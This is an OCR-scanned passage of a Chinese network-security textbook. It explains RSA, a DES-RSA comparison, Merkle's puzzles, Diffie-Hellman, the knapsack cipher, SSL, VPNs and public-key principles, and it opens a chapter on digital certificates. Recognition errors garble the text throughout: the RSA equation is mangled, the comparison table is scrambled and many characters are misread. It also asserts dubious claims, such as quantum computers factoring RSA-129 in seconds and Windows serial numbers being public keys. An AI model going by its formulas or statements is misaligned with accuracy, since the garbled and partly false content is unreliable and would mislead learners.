数学 上 的 单 向 陷 门 函 数 的 特点 是 一 个 方向 求 值 很 容易 ,但 其 逆向 求 值 却 很 困难 。 许 多 
形式 为 Y=Fz) 的 函数 ,对 于 给 定 的 自 变量 z 值 .很 容易 计算 出 函数 Y 的 值 ; 而 由 给 定 的 Y 
值 ,依照 函数 关系 f(x) 计算 xz 值 十 分 困难 。 例 如 ,两 个 大 素数 p 和 g 相 乘 得 到 乘积 ”比较 
容易 计算 ,但 从 它们 的 乘积 分解 出 两 个 大 素数 p 和 g 则 十 分 困难 。 如 果 n 为 足够 大 ,当前 
的 算法 不 可 能 在 有 效 的 时 间 内 实现 。 正 是 基于 这 种 理论 ,1978 年 出 现 了 著名 的 RSA 算法 。 
它 是 第 一 个 既 能 用 于 数据 加 密 也 能 用 于 数字 签名 的 算法 。 它 易于 理解 和 操作 ,也 很 流行 。 
这 种 算法 以 它 的 三 位 发 明 者 的 名 字 命 名 : Ron Rivest、Adi Shamir 和 Leonard Adleman。 它 
经 历 了 各 种 攻击 ,至今 未 被 完全 攻破 。 但 RSA 的 安全 性 一 直 未 能 得 到 理论 上 的 证 明 。 


(2) RSA 算法 的 使 用 

RSA 算法 既 能 用 于 数据 加 密 , 也 能 用 于 数字 签名 。 在 RSA 算法 中 ,包含 两 个 密 钥 ， 
加 密 密 钥 PK 和 解密 密 钥 SK, 加 密 密 钥 是 公开 的 ,其 加 密 与 解密 方程 为 : mn 一 pXg, 其 中 
PE[0,n 一 1],p 和 4g 均 为 大 于 10 100 的 素数 ,这 两 个 素数 是 保密 的 。 

这 种 算法 为 公用 网 络 上 信息 的 加 密 和 鉴别 提供 了 一 种 基本 的 方法 。 先 生成 一 对 RSA 
密 钥 ,其 中 之 一 是 保密 密 钥 , 由 用 户 保存 ; 另 一 个 为 公开 密 钥 ,可 对 外 公开 ,甚至 可 在 网 络 服 
务 器 中 注册 。 为 提高 保密 强度 ,RSA 密 钥 长 度 至 少 为 500 位 ,一般 推荐 使 用 1024 位 。 这 就 
使 加 密 的 计算 量 很 大 。 为 减少 计算 量 ,在 传输 信息 时 , 常 采用 传统 加 密 方法 与 公开 密 钥 加 密 
方法 相 结合 的 方式 , 即 信息 采用 改进 的 DES 或 IDEA 对 话 密 钥 加 密 , 然 后 使 用 RSA 密 钥 加 
密 对 话 密 钥 和 信息 摘要 。 对 方 收 到 信息 后 ,用 不 同 的 密 钥 解密 并 可 核对 信息 摘要 。 

(3) RSA 算法 的 优点 

由 于 RSA 算法 把 加 密 密 钥 和 加 密 算 法 分 开 ,使 得 密 钥 分 配 更 为 方便 ,对 于 网 上 的 大 量 
用 户 ,可 以 将 加 密 密 钥 用 电话 筹 的 方式 印 出 。 如 果 某 用 户 想 与 另 一 用 户 进行 保密 通信 ,只 需 
从 公 钥 敌 上 查 出 对 方 的 加 密 密 钥 ,对 需要 传送 的 信息 加 密 发 出 即 可 。 对 方 收 到 信息 后 ,用 仅 
为 自己 所 知 的 解密 密 钥 将 信息 解密 。 由 此 可 看 出 ,RSA 算法 解决 了 大 量 网 络 用 户 密 钥 管理 
的 难题 。 所 以 它 非常 适用 于 数字 签名 和 密 钥 交 换 。RSA 加 密 算法 是 目前 应 用 最 广泛 的 公 
钥 加 密 算法 ,特别 适用 于 通过 Internet 传输 的 数据 。 

RSA 算法 的 优点 是 密 钥 空间 大 ,缺点 是 密 钥 很 长 ,加 密 速度 慢 。 如 果 RSA 和 DES 结 
合 使 用 , 则 正好 能 弥补 RSA 的 缺点 。 即 用 DES 进行 明文 加 密 , 以 解决 RSA 加 密 速度 慢 的 
问题 ; 用 RSA 进行 DES 密 钥 的 加 密 , 以 解决 DES 密 钥 分 配 的 问题 。 美 国 的 保密 增强 邮件 
(PEM) 就 是 采用 了 RSA 和 DES 结合 的 方法 ,目前 已 成 为 E-mail 保密 通信 标准 。 

假设 用 户 甲 要 寄 信 给 用 户 乙 ,他 们 互相 知道 对 方 的 公 钥 。 甲 就 用 乙 的 公 钥 加 密 邮 件 寄 
出 , 乙 收 到 后 就 可 以 用 自己 的 私 钥 解 密 出 甲 的 原文 。 由 于 别人 不 知道 乙 的 私 钥 , 所 以 即使 是 
甲 本 人 也 无 法 解密 那 封 信 , 这 就 解决 了 信件 保密 问题 。 另 一 方面 ,由 于 每 个 人 都 知道 乙 的 公 
钥 , 他 们 都 可 以 给 乙 发 信 , 要 确定 是 不 是 甲 的 来 信 就 要 用 到 基于 加 密 技术 的 数字 签名 。 

甲 用 自己 的 私 钥 将 签名 内 容 加 密 ,附加 在 邮件 后 ,再 用 乙 的 公 钥 将 整个 邮件 加 密 ( 注 意 
这 里 的 次 序 , 如 果 先 加 密 再 签名 的 话 ,别人 可 以 将 签名 去 掉 后 签 上 自己 的 签名 ,从 而 算 改 了 
签名 ) 。 这 样 这 份 密 文 被 乙 收 到 以 后 , 乙 用 自己 的 私 钥 将 邮件 解密 ,得 到 甲 的 原文 和 数字 签 
名 ,然后 用 甲 的 公 钥 解密 签名 ,这 样 就 可 以 确保 两 方面 的 安全 。 

(4) RSA 和 DES 算法 对 比 

DES 算法 和 RSA 算法 各 有 优 缺 点 ,DES 算法 和 RSA 算法 的 比较 如 表 2. 1 所 示 。 


3. Ralph Merkle 猜谜 法 


虽然 Ralph Merkle 猜谜 法 并 没有 付 诸 实施 ,但 它 是 第 一 个 认真 思考 公共 密 钥 加 密 问题 
的 算法 。 该 算法 于 1974 年 由 美国 加 州 大 学 伯克利 分 校 的 学 生 Ralph Merkle 提出 ,核心 是 
做 100 万 个 猜 这 题 ,每 道 恋 题 藏 有 一 个 密码 求解 一 道 谜 题 大 约 需 要 2 分 钟 时 间 。 该 算法 的 
工作 流程 是 这 样 的 : 甲 方 先 随机 地 产生 100 万 把 密 钥 .并 藏 在 100 万 道 谜 题 里 ,然后 把 这 
100 万 道 谜 题 发 送 给 乙方 ; 乙方 收 到 后 ,随意 挑选 并 求解 一 道 谜 题 , 取 出 其 中 的 那 把 密 钥 ， 
再 用 该 密 钥 对 一 个 双方 事先 统一 的 报 文 加 密 , 这 段 报 文 可 以 任意 , 且 无 需 保 密 ; 加 密 后 ,把 


26 
辆 络 与 信息 安全 基础 


密 文 发 送 给 甲 方 ; 甲 方 并 不 知道 乙方 选择 了 哪 把 密 钥 ,于 是 使 用 自己 保存 的 100 万 把 密 钥 
逐一 进行 尝试 解密 ; 其 中 必 有 一 个 是 可 行 的 ,这 把 密 钥 不 为 其 他 人 所 知 ,所 以 可 以 作为 以 后 
通信 使 用 的 密 钥 。 

表 2.1 DES 算法 和 RSA 算法 对 比 表 


对 比 项 目 DES 算 法 RSA 算法 
加 密 、 解 密 的 处 理 ” 优 于 RSA 算法 ,因为 DES 密 钥 的 ” 比 DES 算 法 慢 ,RSA 算法 需要 进行 诸如 200 
效率 长 度 只 有 56 位 ,可 以 利用 软件 和 ” 位 整数 的 乘 短 和 求 模 等 多 倍 字 长 的 处 理 , 处 
硬件 实现 高 速 处 理 理 速度 明显 慢 于 DES 算法 
密 钥 管理 不 如 RSA 算法 ,DES 算法 要 求 通 ” 比 DES 算法 更 加 优越 ,因为 RSA 算法 可 采 


信 前 对 密 钥 进行 秘密 分 配 , 密 钥 的 ”用 公开 形式 分 配 加 密 密 钥 ,对 加 密 密 钥 的 更 
更 换 困 难 ,对 不 同 的 通信 对 象 ， 新 也 很 容易 ,并 且 对 不 同 的 通信 对 象 ,只 需 对 
DES 需 产 生 和 保管 不 同 的 密 钥 自己 的 解密 密 钥 保密 即 可 


安全 性 较 好 ,不 易 破译 较 好 ,不 易 破译 
和 和 A tr 非常 容易 进行 数字 签名 和 身份 认证 


如 果 传 输 过 程 中 被 人 窃取 ,那么 窃取 者 可 能 窃取 到 甲 方 发 出 的 100 万 道 谜 题 , 也 可 能 窃 
取 到 乙方 返回 的 密 文 。 但 要 想 知道 乙方 选中 了 哪 把 密 钥 ,窃取 者 只 能 去 求解 100 万 道 谜 题 ， 
由 于 解 开 一 个 谜 题 需要 2 分 钟 时 间 , 按 50% 的 解 出 概率 计算 ,窃取 者 需要 23 个 月 的 时 间 才 
能 找到 答案 。 不 过 那 时 通信 双方 早已 结束 了 通信 ,完成 了 秘密 任务 或 改换 了 密码 ,窃取 者 的 
工作 已 经 没有 多 大 意义 了 。 

Ralph Merkle 猜谜 法 有 一 个 柬 端 , 那 就 是 收发 双方 之 间 的 通信 系统 必须 能 够 在 合理 的 
时 间 内 传输 100 万 道 谜 题 ,而 且 甲 方 应 拥有 快速 的 计算 机 以 产生 100 万 道 谜 题 和 尝试 100 
万 次 搜索 , 找 出 乙方 选择 的 密码 。 如 果 计 算 机 性 能 不 佳 ,显然 这 种 方法 就 不 太 实用 了 。 


4. Diffie-Hellman 指数 密 钥 交换 加 密 算法 


该 算法 于 1976 年 由 美国 斯 坦 福 大 学 的 Whitfield Diffie 和 Martin Hellman 提出 ,利用 
了 离散 指数 易 求 而 反 函 数 难 求 的 特性 来 设计 加 密 系统 ,是 专门 为 通信 双方 主动 参与 的 通信 
过 程 设 计 的 。 该 算法 非常 简捷 。 它 让 通信 双方 共同 参与 一 个 数学 运算 过 程 ,并 统一 使 用 一 
个 用 于 以 后 加 密 的 密 钥 。 即 使 监听 者 能 窃取 到 全 部 交换 信息 ,但 由 于 没有 参与 运算 ,他 也 无 
法 获得 最 终 的 密 钥 。 通 信 双 方 首先 各 自 挑选 一 个 秘密 的 数字 ,然后 交换 一 些 由 此 数字 导出 
的 信息 ; 接 下 来 利用 这 些 信息 ,通过 离散 指数 和 质数 求 余 等 运算 就 可 以 进一步 推导 出 一 个 
统一 的 密 钥 ,用 于 加 密 以 后 的 通信 信息 。 该 密 钥 交换 加 密 算 法 的 工作 过 程 如 下 : 

QO@ 通信 双方 统一 两 个 数 D 和 瓦 。D 与 互 无 须 对 外 保密 。 

@ 双方 各 自选 择 一 个 秘密 的 数 X, 并 把 包括 D,H 和 XX 的 计算 结果 Y 发 送 给 对 方 。 例 
如 : 假设 甲 方 选中 了 Xi , 则 发 出 了 YY! ; 乙方 选中 了 X。 , 则 发 出 了 Y: 。 

@ 根据 算法 ,双方 各 自 使 用 自己 选择 的 XX 和 收 到 的 了 ,计算 出 一 个 统一 的 数字 KK。K 就 
是 双方 进一步 通信 的 会 话 密 钥 。 具 体 地 讲 ,K 可 以 从 (Xi,Y;) 或 (X;,Y,) 中 导出 ,但 却 不 能 
从 (Yi ,ys ) 中 得 到 。 这 一 点 的 重要 意义 在 于 ,窃听 者 虽然 可 以 得 到 D、H、Y, 和 Y, ,甚至 密 文 ， 
但 由 于 不 知道 X 和 Xs 的 值 ,因此 无 法 获得 导出 正确 的 会 话 密 钥 及 ,也 就 无 法 破解 密 文 。 
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@ 以 后 通信 时 ,双方 便 使 用 K 进行 加 密 和 解密 。 
Diffie-Hellman 算法 的 丙 端 在 于 收发 双方 必须 同时 参与 密码 的 生成 过 程 ,所 以 它 不 适 
合用 于 电子 函件 的 加 密 , 因 为 电子 函件 在 收 信人 不 在 场 时 也 应 当 能 够 发 送出 去 。 


5. Merkle-Hellman 背包 算法 


该 算法 是 根据 数学 上 的 背包 问题 设计 的 。 背 包 问 题 是 一 个 最 优化 问题 , 即 对 于 一 个 给 
定 空间 或 负重 的 背包 和 许多 大 小 不 一 的 物体 ,哪些 物体 放 入 背包 才能 使 浪费 的 背包 空间 或 
负重 最 小 ? 在 背包 很 小 和 物体 数目 较 少时 ,这 个 问题 还 比较 容易 解决 ; 但 当 背 包 很 大 且 有 
很 多 个 物体 时 ,问题 的 解决 就 十 分 困难 。 通 常 这 个 问题 会 有 一 个 或 者 多 个 解 ,也 有 可 能 根本 
没有 解 。 

1977 年 ,Merkle 与 Hellman 合作 设计 了 利用 背包 问题 实现 信息 加 密 的 方法 。 其 工作 
原理 是 : 假定 甲 想 加 密 , 则 先 产 生 一 个 较 易 求解 的 背包 问题 ,并 用 它 的 解 作为 专用 密 钥 ; 然 
后 从 这 个 问题 出 发 ,生成 另 一 个 难 解 的 背包 问题 ,并 作为 公共 密 钥 。 如 果 乙 想 向 甲 发 送 报 
文 , 乙 就 可 以 使 用 难 解 的 背包 问题 对 报 文 进 行 加 密 , 由 于 这 个 问题 十 分 难 解 ,所 以 一 般 没 有 
人 能 够 破译 密 文 ; 甲 收 到 密 文 后 ,可 以 使 用 易 解 的 专用 密 钥 解密 。 

该 算法 提出 以 后 ,经 过 多 年 的 探讨 和 研究 ,最 终 发 现 它 存在 一 个 致命 性 错误 ,使 之 失去 
任何 保密 的 实用 价值 ,这 里 不 再 著述 。 


2.3 ”加 密 技 术 的 发 展 


信息 安全 问题 涉及 到 国家 安全 社会 公共 安全 ,世界 各 国 已 经 认识 到 信息 安全 涉及 重大 
国家 利益 ,是 互联 网 经 济 的 制高点 ,也 是 推动 互联 网 发 展 .电子 政务 和 电子 商务 的 关键 ,发 
展 信息 安全 技术 是 我 国 目 前 面临 的 迫切 要 求 。 
随 着 科学 技术 的 发 展 ,尤其 是 微 电 子 技术 的 发 展 ,使 得 传统 的 加 密 技术 得 到 了 快速 地 
发 展 。 
23.1 密码 专用 芯片 集成 


密码 技术 正在 向 芯片 化 方向 发 展 。 在 芯片 设计 制造 方面 ,目前 微 电 子 水 平 已 经 发 展 到 
0.1pm 工艺 以 下 ,芯片 设计 水 平 很 高 。 

虽然 我 国 在 密码 专用 芯片 领域 的 研究 起 步 较 晚 ,但 近年 来 我 国 集成 电路 产业 技术 的 创 
新 和 自我 开发 能 力 得 到 了 提高 ,从 而 推动 了 密码 专用 芯片 的 发 展 。 加 快 密码 专用 芯片 的 研 
制 将 会 推动 我 国信 息 安全 系统 的 进一步 完善 。 


232 量子 加 密 技术 的 研究 


量子 技术 在 密码 学 上 的 应 用 分 为 两 类 : 一 是 利用 量子 计算 机 对 传统 密码 体制 的 分 析 ; 
二 是 利用 单 光 子 的 测 不 准 原理 在 光纤 一 级 实现 密 钥 管理 和 信息 加 密 , 即 量子 密码 学 。 量 子 
计算 机 是 一 种 传统 意义 上 的 超大 规模 并 行 计算 系统 ,利用 量子 计算 机 可 以 在 几 秒 钟 内 分 解 
RSA129 的 公 钥 。 

根据 Internet 的 发 展 状况 ,全 光纤 网 络 将 是 今后 网 络 连 接 的 发 展 方向 ,利用 量子 技术 可 
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以 实现 传统 的 密码 体制 ,在 光纤 一 级 完成 密 钥 交换 和 信息 加 密 , 其 安全 性 是 建立 在 
Heisenberg 的 测 不 准 原理 上 的 ,如 果 攻 击 者 企图 接收 并 检测 信息 发 送 方 的 信息 (偏振 ), 则 
将 造成 量子 状态 的 改变 ,这 种 改变 对 于 攻击 者 而 言 是 不 可 恢复 的 ,而 对 于 收发 方 则 可 很 容易 
地 检测 出 信息 是 否 受到 攻击 。 目 前 量子 加 密 技 术 仍 然 处 于 研究 阶段 ,其 量子 密 钥 分 配 QKD 
在 光纤 上 的 有 效 距离 还 达 不 到 远 距 离 光纤 通信 的 要 求 。 


2.4 ”加 密 技 术 的 应 用 


加 密 技术 的 应 用 是 多 方面 的 ,但 在 电子 商务 和 VPN 上 的 应 用 最 广 , 下 面 就 这 两 个 方面 
分 别 进行 简 述 。 


24.1 加 密 技术 在 电子 商务 方面 的 应 用 


电子 商务 (E-Business) 使 顾客 可 以 在 网 上 进行 各 种 商务 活动 ,而 不 必 担 心 自 己 的 信用 
卡 会 被 人 盗用 。 过 去 ,用户 为 了 防止 信用 卡 的 号 码 被 窃取 ,一 般 是 通过 电话 订货 ,然后 使 用 
用 户 的 信用 卡 进行 付款 。 现 在 人 们 开始 用 RSA( 一 种 公开 /私有 密 钥 ) 的 加 密 技术 ,提高 信 
用 卡 交 易 的 安全 性 ,从 而 使 电子 商务 走向 实用 成 为 可 能 。 

NETSCAPE 公司 是 Internet 产业 中 领先 技术 的 提供 者 ,该 公司 提供 了 一 种 基于 RSA 
和 保密 密 钥 .应 用 于 Internet 的 技术 ,被 称 为 安全 套 接 层 (Secure Sockets Layer,SSL ) 。 

Socket 是 一 个 编程 界面 ,并 不 提供 任何 安全 措施 ,而 SSL 不 但 提供 编程 界面 ,而 且 向 上 
提供 一 种 安全 的 服务 ,SSL 3. 0 现在 已 经 应 用 到 了 服务 器 和 浏览 器 上 ,SSL 2.0 则 只 能 应 用 
于 服务 器 端 。 

SSL 3. 0 用 一 种 电子 证 书 (Electric Certificate, EC) 来 实行 身份 进行 验证 后 ,双方 就 可 
以 用 保密 密 钥 进行 安全 的 会 话 。 它 同时 使 用 对 称 式 和 非 对 称 式 加 密 方 法 ,在 用 户 与 电子 商 
务 网 站 的 服务 器 进行 沟通 的 过 程 中 ,用 户 会 产生 一 个 Session Key, 然 后 用 户 用 服务 器 端的 
公 钥 将 Session Key 进行 加 密 , 再 传 给 服务 器 端 ,在 双方 都 知道 Session Key 后 ,传输 的 数据 
都 是 以 Session Key 进行 加 密 与 解密 的 ,但 服务 器 端 发 给 用 户 的 公 钥 必须 先 向 有 关 发 证 机 
关 申 请 ,以 得 到 公证 。 

基于 SSL 3. 0 提供 的 安全 保障 ,用 户 就 可 以 自由 订购 商品 并 且 给 出 信用 卡 卡号 了 ,也 可 以 
在 网 上 和 合作 伙伴 交流 商业 信息 并 且 让 供应 商 把 订单 和 收 货 单 从 网 上 发 过 来 ,这 样 可 以 节省 
大 量 的 纸张 和 大 量 的 电话 、 传 真 费用 。 在 过 去 ,电子 信息 交换 (Electric Data Interchange， 
EDD) .信息 交易 (information transaction) 和 金融 交易 (financial transaction) 都 是 在 专用 网 
络 上 完成 的 ,使 用 专用 网 的 费用 大 大 高 于 Internet。 正 是 这 样 巨 大 的 诱惑 , 才 使 人 们 开始 发 
展 Internet 上 的 电子 商务 。 


242 加 密 技术 在 VPN 中 的 应 用 


现在 , 越 来 越 多 的 公司 走向 国际 化 ,一 个 公司 可 能 在 多 个 国家 都 有 办 事 机 构 或 销售 中 
心 ,每 一 个 机 构 都 有 自己 的 局 域 网 (Local Area Network.LAN), 但 在 当今 的 网 络 社 会 人 们 
的 要 求 不 仅 如 此 ,用 户 希 望 将 这 些 LAN 连接 在 一 起 组 成 一 个 公司 的 广域网 ,这 个 在 现在 已 
不 是 什么 难事 了 。 
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事实 上 ,很 多 公司 都 已 经 这 样 做 了 ,但 他 们 一 般 使 用 租用 专用 线路 来 连接 这 些 局 域 网 ， 
专用 线 虽 然 安 全 性 较 高 ,但 费用 也 很 高 。 现 在 具有 加 密 / 解 密 功 能 的 路 由 器 价格 不 断 下 降 ， 
这 就 使 用 户 通过 因特网 连接 这 些 局 域 网 的 成 本 降低 ,这 就 是 通常 所 说 的 虚拟 专用 网 
(Virtual Private Network,VPN) 。 当 数据 离开 发 送 者 所 在 的 局 域 网 时 ,该 数据 首先 被 用 户 
端 连接 到 Internet 上 的 路 由 器 进行 硬件 加 密 ,数据 在 Internet 上 是 以 加 密 的 形式 传输 的 , 当 
达到 目的 LAN 的 路 由 器 时 ,该 路 由 器 就 会 对 数据 进行 解密 ,目的 LAN 中 的 用 户 就 可 以 看 
到 真正 的 信息 。 


2.5 基于 双 钥 技术 的 现代 加 密 方法 


本 节 介 绍 双 钥 技术 的 工作 原理 和 优点 。 作 为 一 种 新 技术 建议 用 户 多 了 解 其 原理 和 性 
能 ,而 不 要 盲目 进行 尝试 ,因为 新 技术 的 产生 还 要 经 过 测试 和 攻击 的 检验 ,在 新 技术 的 发 展 
初期 ,技术 上 的 完善 是 一 个 必须 完成 的 过 程 。 


25.1 双 钥 技术 工作 原理 分 析 


双 钥 技术 就 是 公共 密 钥 加 密 (Public Key Encryption, PKE) 技 术 , 它 使 用 两 把 密 钥 ,一 
把 公共 密 钥 (Public Key) 和 一 把 专用 密 钥 (Private Key) ,前 者 用 于 加 密 ,后 者 用 于 解密 。 这 
种 方法 也 称 为 非 对 称 式 加 密 方法 , 它 解 决 了 传统 加 密 方法 的 根本 性 问题 , 极 大 地 简化 了 密 钥 
分 发 的 工作 量 。 它 与 传统 加 密 方法 相 结合 ,可 以 进一步 增强 传统 加 密 方法 的 可 靠 性 。 更 为 
突出 的 优点 是 ,利用 公共 密 钥 加 密 技 术 可 以 实现 数字 签名 。 

传统 加 密 方法 的 工作 过 程 如 下 。 

Q@ 设置 一 个 保险 箱 ,并 装置 一 把 庶 入 箱子 的 暗 锁 ,这 种 锁 只 能 使 用 钥匙 才能 锁 上 ,再 准 
备 2 把 相同 的 钥匙 。 这 对 应 于 加 密 方 法 ,钥匙 对 应 于 密 钥 。 

@ 发 信 方 和 收 信 方 必须 各 自持 有 一 把 能 开锁 的 钥匙 。 这 对 应 于 密 钥 分 发 过 程 。 

@ 发 信 方 将 通信 文件 放 入 保险 箱 , 并 使 用 自己 持 有 的 钥匙 把 锁 锁 起 来 。 这 对 应 于 加 密 
过 程 。 

@ 运送 保险 箱 。 这 对 应 于 信息 传输 过 程 。 

@ 保险 箱 送 到 目的 地 后 , 收 信人 用 自己 持 有 的 钥匙 打开 锁 ,取出 通信 文件 。 这 对 应 于 
解密 过 程 。 

全 部 过 程 的 最 大 困难 在 步骤 @, 即 通信 双方 必须 都 获得 一 把 统一 的 钥匙 ,如 果 仔 细 分 析 
一 下 ,可 以 发 现 ,发 信人 真正 需要 的 仅仅 是 一 个 能 装 秘密 文件 并 能 锁 上 的 保险 箱 , 没 有 必要 
也 持 有 一 把 钥匙 ,之 所 以 要 有 钥匙 ,是 因为 使 用 了 嵌入 箱子 的 暗 锁 。 显 然 ,只 要 不 使 用 这 种 
锁 , 而 使 用 一 种 不 用 钥匙 也 能 锁 上 的 锁 , 则 发 信人 就 可 以 在 没有 钥匙 的 情况 下 , 锁 住 保险 箱 。 
基于 这 种 思想 ,可 以 按 如 下 过 程 进行 加 密 。 

za 设置 一 个 保险 箱 ,并 设置 一 把 不 需 使 用 钥匙 就 能 锁 上 的 锁 , 再 准备 一 把 钥匙 。 这 对 
应 于 加 密 方法 ,钥匙 对 应 于 专用 密 钥 。 

@ 收 信 方 持 有 这 把 开锁 的 钥匙 ,同时 准备 该 钥匙 可 以 开 的 锁 , 锁 可 以 不 止 有 一 把 ,然后 
把 锁 公 开发 放出 去 。 这 里 锁 对 应 于 公共 密 钥 ,这 个 过 程 对 应 于 公共 密 钥 分 发 过 程 。 

@ 任何 人 想 与 收 信 方 通信 ,只 需 将 通信 文件 放 入 保险 箱 ,并 使 用 收 信 方 承认 的 锁 锁 起 
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来 。 这 对 应 于 加 密 过 程 。 

@ 运送 保险 箱 。 这 对 应 于 信息 传输 过 程 。 

@@ 保险 箱 达 到 目的 地 后 , 收 信人 用 自己 持 有 的 唯一 的 钥匙 打开 锁 ,取出 通信 文件 。 这 
对 应 于 解密 过 程 。 

由 于 可 以 开锁 的 钥匙 上 只 有 一 把 ,而 且 掌握 在 收 信 人 手 里 。 因 此 可 以 确信 除 收 信人 本 人 
外 ,没有 任何 人 能 够 打开 锁 着 的 保险 箱 并 偷 阅 其 中 通信 文件 的 内 容 , 发 信人 也 不 例外 。 更 为 
重要 的 是 , 密 钥 分 发 的 难题 也 不 复 存在 ,而 是 代 之 以 锁 的 分 发 问题 。 分 发 锁 是 无 须 保密 的 ， 
这 无 疑 使 以 前 的 艰难 工作 简单 了 许多 。 这 就 是 公共 密 钥 加 密 技 术 的 工作 原理 。 

公共 密 钥 加 密 系统 中 , 收 信人 首先 生成 在 数学 上 相互 关联 ,但 又 不 相同 的 两 把 钥匙 ,一 
把 公共 密 钥 用 于 加 密 , 另 一 把 专用 密 钥 用 于 解密 ,这 一 过 程 称 为 密 钥 配 制 过 程 。 其 中 公共 密 
钥 相 当 于 例子 中 不 需 使 用 钥匙 就 能 锁 上 的 锁 , 用 于 通信 的 加 密 ; 另 一 把 专用 密 钥 相当 于 例 
中 提 到 的 那 把 开锁 的 唯一 的 钥匙 ,用 于 通信 的 解密 。 收 信人 将 唯一 的 专用 密 钥 掌握 和 保存 
起 来 ,把 公共 密 钥 通过 各 种 方式 公布 出 去 ,让 想 与 其 通信 的 人 能 够 得 到 。 这 个 过 程 就 是 公共 
密 钥 的 分 发 过 程 。 发 信人 使 用 收 信人 的 公共 密 钥 对 通信 文件 进行 加 密 , 加 密 后 的 密 文 发 信 
人 自己 也 无 法 解 开 ,这 相当 于 把 信件 可 靠 地 锁 在 保险 箱 里 。 收 信人 在 收 到 密 文 以 后 ,用 自己 
的 专用 密 钥 解 开 密 文 获得 明文 信息 。 


252 公共 密 钥 加 密 系统 的 优点 


与 传统 加 密 方法 相 比 ,公共 密 钥 加 密 系 统 具 有 以 下 三 个 比较 突出 的 优点 : 

中 用 户 可 以 把 用 于 加 密 的 密 钥 ,公开 地 分 发 给 任何 用 户 。 谁 都 可 以 使 用 这 把 公共 的 加 
密 密 钥 与 该 用 户 秘密 通信 。 除 了 持 有 解密 密 钥 的 收 件 方 用 户外 ,没有 人 能 够 解 开 密 文 。 这 
样 ,传统 加 密 方 法 中 令 人 头痛 的 .代价 沉重 的 密 钥 分 发 问题 就 转变 为 一 个 性 质 完 全 不 同 的 公 
共 密 钥 分 发 问题 。 

@ 公共 密 钥 加 密 系统 允许 用 户 事先 把 公共 密 钥 发 表 或 刊登 出 来 。 例 如 ,用 户 可 以 把 它 
和 电话 号 码 产品 说 明 等 一 起 刊登 出 来 ,让 任何 人 都 可 以 查找 并 使 用 。 这 使 得 公共 密 钥 应 用 
的 范围 不 再 局 限于 信息 加 密 , 还 可 以 应 用 于 身份 鉴别 .权限 区 分 等 各 种 领域 。 例 如 ,大 家 熟 
知 的 各 种 应 用 软件 ,如 Windows 95/98 等 系统 安装 时 需要 的 产品 序列 号 ,其 实 就 是 公共 密 
钥 , 它 通常 印 在 产品 授权 书 的 封面 或 封底 上 , 供 安装 时 鉴别 用 户 的 授权 身份 。 

@ 公共 密 钥 加 密 不 仅 改进 了 传统 加 密 方法 ,而 且 还 提供 了 传统 加 密 方法 所 不 具备 的 应 
用 , 即 数字 签名 的 公开 鉴定 系统 。 有 关 数 字 签 名 的 工作 原理 将 在 第 3 章 中 介绍 。 


习题 


. 数据 安全 主要 的 三 个 组 成 部 分 是 什么 ? 
. 加密 技 术 经 历 的 三 个 阶段 是 什么 ? 

. 加密 技术 通常 分 为 哪 两 大 类 ? 

. DES 主要 的 应 用 范围 是 哪些 ? 

. 密码 技术 发 展 的 历程 和 趋势 是 什么 ? 


mm 性 
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随 着 网 络 安全 技术 的 发 展 ,数字 签名 和 认证 技术 得 到 了 广泛 的 应 用 ,但 
是 普通 用 户 在 日 常 浏览 网 页 等 应 用 中 涉及 相关 的 内 容 较 少 ,公众 对 数字 签名 
和 证 书 的 使 用 非常 有 限 。 

本 章 要 点 如 下 : 

。 数字 证 书 的 定义 和 用 途 ; 

。 SSL 的 工作 原理 ; 

。 SSL 的 实施 和 管理 ; 

。 SSL 攻击 与 防护 。 


3.1 数字 证 书简 介 


一 般 人 认为 SSL 是 保护 主机 或 者 一 个 应 用 程序 的 ,这 是 一 个 误解 ,SSL 
是 设计 用 来 保护 传输 中 的 信息 的 , 它 的 任务 是 把 在 网 页 以 及 服务 器 之 间 的 数 
据 传 输 加 密 起 来 。 这 个 加 密 的 措施 能 够 防止 信息 窃取 者 直接 看 到 传输 中 的 
信息 ,如 密码 或 者 信用 卡号 码 等 。 提 到 SSL 用 户 就 必须 了 解数 字 证 书 
(Digital Certificates) 的 概念 。 

数字 证 书 是 一 种 能 在 完全 开放 的 系统 中 准确 标识 某 些 主体 的 机 制 。 一 
个 数字 证 书包 含 的 信息 必须 能 够 鉴定 用 户 身 份 ,确保 该 用 户 就 是 其 所 持 有 证 
书 中 声明 的 用 户 。 除 了 唯一 的 标识 信息 外 ,数字 证 书 还 包含 了 证 书 所 有 者 的 
公共 密 钥 。 数 字 证 书 的 使 用 允许 SSL 提供 认证 功能 一 一 保证 用 户 所 请 求 连 
接 的 服务 器 身份 正确 无 误 。 

很 明显 的 ,SSL 技术 提供 了 有 效 的 认证 。 然 而 大 多 数 用 户 并 未 能 正确 意 
识 到 通过 SSL 进行 安全 连接 的 必要 性 。 


311 证 书 介绍 


公 钥 证 书 ( 通 常 称 为 证 书 ) 是 用 于 身份 验证 的 经 过 数字 签名 的 声明 , 它 可 
以 保护 开放 网 络 中 的 信息 。 证 书 将 公 钥 与 保存 对 应 私 钥 的 实体 牢固 地 绑 定 
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在 一 起 。 颁 发 证 书 的 CA 对 证 书 进行 数字 签名 。 

公 钥 证 书 以 不 对 称 加 密 或 公 钥 加 密 为 基础 。 不 对 称 密码 是 根据 公 钥 和 私 钥 之 间 的 唯一 
数学 关系 构建 的 。 公 钥 是 与 公 钥 算 法 一 起 使 用 的 加 密 密 钥 对 的 公开 部 分 。 在 对 会 话 密 钥 进 
行 加 密 、 验 证 数字 签名 或 对 可 使 用 对 应 私 钥 解密 的 数据 进行 加 密 时 ,通常 会 使 用 公 钥 。 私 钥 
是 与 公 钥 算 法 一 起 使 用 的 加 密 密 钥 对 的 机 密 部 分 。 私 钥 通常 用 于 对 会 话 密 钥 进行 解密 ,对 
数据 进行 数字 签名 或 对 使 用 对 应 公 钥 加 密 的 数据 进行 解密 。 

当前 常用 的 证 书 基于 X. 509 v3 证 书 标准 。X. 509 v3 代表 国际 电信 联盟 电信 标准 部 门 
(ITU-T) 建 议 X. 509( 用 于 证 书 语法 和 格式 ) 的 第 3 版 。X. 509 证 书包 括 公 钥 和 有 关 证 书 授 
予 的 人 员 或 实体 的 信息 、 有 关 证 书 的 信息 以 及 有 关 颁 发 证 书 的 CA 的 可 选 信息 。 

接收 证 书 的 实体 是 证 书 的 主题 。 证 书 的 颁发 者 和 签名 者 是 CA。 通 常 证 书包 含 如 下 
信息 : 

。 主题 的 公 钥 值 ; 

。 主题 的 标识 信息 ,例如 名 称 和 电子 邮件 地 址 ; 

